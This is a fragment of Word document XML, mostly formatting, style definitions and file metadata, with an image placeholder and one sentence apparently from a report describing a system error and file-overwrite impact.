      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5842000" cy="14306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842000" cy="1430830"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="ued1e3fbb"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>No matter what interface you access, this error is reported because the database has been disconnected and the system is down and you can overwrite any file and affect the use of the system. Right</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>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docVars>
    <w:docVar w:name="commondata" w:val="eyJoZGlkIjoiY2NhYzZhYjljMzQ3ZDY2YWJjZjJmM2RlNDZjMzhkZWIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="77396F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autoRedefine/>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autoRedefine/>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autoRedefine/>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autoRedefine/>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autoRedefine/>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qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="22"/>
    <w:autoRedefine/>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autoRedefine/>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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="20"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="16">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="14"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="14"/>
    <w:link w:val="9"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="14"/>
    <w:link w:val="2"/>
    <w:autoRedefine/>
    <w:qFormat/>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autoRedefine/>
    <w:qFormat/>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autoRedefine/>
    <w:qFormat/>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autoRedefine/>
    <w:qFormat/>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autoRedefine/>
    <w:qFormat/>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autoRedefine/>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autoRedefine/>
    <w:qFormat/>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2024-02-07T13:13:20Z</dcterms:created>
  <dc:creator>22938</dc:creator>
  <cp:lastModifiedBy>Echo丶</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-07T13:15:48Z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70DD2977F4784458AAFA229724D17AD1_12</vt:lpwstr>
  </property>
</Properties>
</file>